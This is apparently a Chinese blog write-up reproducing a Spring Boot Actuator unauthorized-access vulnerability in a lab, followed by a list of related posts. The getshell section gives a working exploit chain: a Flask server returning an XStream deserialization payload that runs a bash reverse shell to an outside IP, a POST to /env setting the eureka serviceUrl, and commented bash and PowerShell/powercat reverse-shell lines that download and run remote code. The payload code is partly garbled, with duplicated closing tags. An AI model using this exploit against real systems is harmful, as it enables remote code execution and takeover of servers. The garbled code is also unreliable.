漏洞复现 - - - Springboot未授权访问
目录
一, 未授权访问是什么?
二,Actuator介绍
三,怎么进行漏洞发现呢?
四,实验环境
五,漏洞复现
1.通过访问env获取全部环境属性
2.通过/trace提供基本的http请求跟踪信息
3.利用反序列化进行getshell
1.启动脚本
2.开启监听
3.使用bp抓取一个/env的包
4.修改POST数据
一, 未授权访问是什么?
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露
二,Actuator介绍
Spring Boot 基本上是 Spring 框架的扩展。 Actuator 是 Springboot 提供的用来对应用系统进行 自省和监控的功能模块,借助于 Actuator ,开发者可以很方便地对应用系统的某些监控指标进行查 看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点( endpoints )来获取应用系统中的监控信息。
三,怎么进行漏洞发现呢?
1. 分析web 应用使用的框架为 springboot 框架
2.如果web应用开发者没有修改springboot web默认图标
3.如果修改了默认图标,我们通过访问refresh web网页报错进行分析,如果 web 应用开发者没有修改 springboot web 应用的默认 4xx、5xx 报错页面,那么当 web 应用程序出现 4xx、5xx 错误时,会报错如下如图所示
四,实验环境
靶机:Centos7+springboot IP地址:10.1.1.137:8090
攻击机:Kali IP地址:10.1.1.135
五,漏洞复现
1.通过访问env获取全部环境属性
2.通过/trace提供基本的http请求跟踪信息
3.利用反序列化进行getshell
需要以下两个包(环境已安装)
spring-boot-starter-actuator(/refresh刷新配置需要)
spring-cloud-starter-netflix-eureka-client(功能依赖)
采用脚本的方式
# linux反弹shell bash -i >& /dev/tcp/192.168.20.82/9999 0>&1
# windows反弹shell
# <string>powershell</string>
# <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>
# <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string>
from flask import Flask,Responseapp =Flask(_name_)@app.route('/xstream', defaults={ ''})
@app.route('/xstream/<path:path>')
def catch_all(path):xml = """<linked-hash-set><jdk.nashorn.internal.objects.NativeString><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Date"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>bash</string><string>-c</string><string>bash -i >& /dev/tcp/139.9.198.30/1234 0>&1</string> //攻击机的IP</command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer></is></dataSource></dataHandler></value></jdk.nashorn.internal.objects.NativeString></linked-hash-set>"""</is></dataSource></dataHandler></value></jdk.nashorn.internal.objects.NativeString></linked-hash-set>"""return Response(xml, mimetype='application/xml')if __name__ == "__main__":app.run(host='0.0.0.0', port=2333)采用一个启动脚本的服务
注意讲脚本中的IP改为自己的IP,并且开启一个监听端口
1.启动脚本
2.开启监听
3.使用bp抓取一个/env的包
4.修改POST数据
eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream
点击forward发送请求
访问/refresh,还是显示一次错误页面。我们对此进行抓包
我们讲此修改为post请求,数据包随机输入就可以
查看监听的端口,我们可以看到得道了一个shell,复现成功!!!
漏洞复现 - - - Springboot未授权访问相关推荐
- 漏洞复现-rides未授权访问
漏洞复现-rides未授权访问 0x00 环境准备 达成效果:不知道密码的情况下,远程ssh连接靶机 达成条件: # 1.关闭rides受保护模式 vim /etc/redis/6379.conf 注 ...
- 2022-10-08(Discuz漏洞、FCKeditor文本编辑器漏洞、ZooKeeper 未授权访问、Memcahe 未授权访问)
文章目录 Discuz漏洞-请求报文中含有恶意的PHP代码(CVE-2019-13956) FCKeditor文本编辑器漏洞 test.html browser.html fckeditor.html ...
- 漏洞检测与防御:Redis未授权访问漏洞复现
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...
- 漏洞复现 - - - 未授权访问漏洞Redis
目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 编辑 ...
- 二十八种未授权访问漏洞合集(暂时最全)
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...
- 常用的30+种未授权访问漏洞汇总
未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...
- Atlassian Crowd 未授权访问漏洞
简介 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品.Atlassian Crowd是一套基于Web的单点登录系统.该系 ...
- 未授权访问漏洞-Redis未授权访问漏洞
文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...
- Atlassian Crowd 未授权访问漏洞(详细版)
说明 仅供技术学习交流.请勿用于非法行为.否则后果自负 0x01 漏洞简述 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产 ...
最新文章
- UVa 11624,两次BFS
- linux内存屏障浅析
- Python连接DM8数据库
- Xshell代理访问外网或者公司的内网
- 老白聊数据-关于销售预测的那些事
- element 如何自定义svg图标_【第2018期】小图标,大学问
- 脑力大挑战,1分钟 Serverless 部署“线上魔方”赢魔方
- matlab 图像中加入高斯白噪声,matlab – 使用imnoise为图像添加高斯噪声
- 目标检测、语义分割性能指标
- bugly怎么读_Bugly迁入
- Python爬取LOL英雄皮肤
- c语言英文版孤独怎么说,孤独的伤感的英文句子
- 论文阅读:A Unified Span-Based Approach for Opinion Mining with Syntactic Constituents
- mysql error 1_mysql 启动错误(InnoDB: Operating system error number 1
- [转载]中国移动深度定制首推“0元购TD手机”补贴政策
- html时显示当前时间的时钟,javascript实现页面的实时时钟显示示例
- 中国医科大学2021年12月《中医护理学基础》作业考核试题
- OnInitDialog()中SetFocus()不起作用解决方法
- 使用openssl生成crt证书
- 关于我转生成史莱姆这件事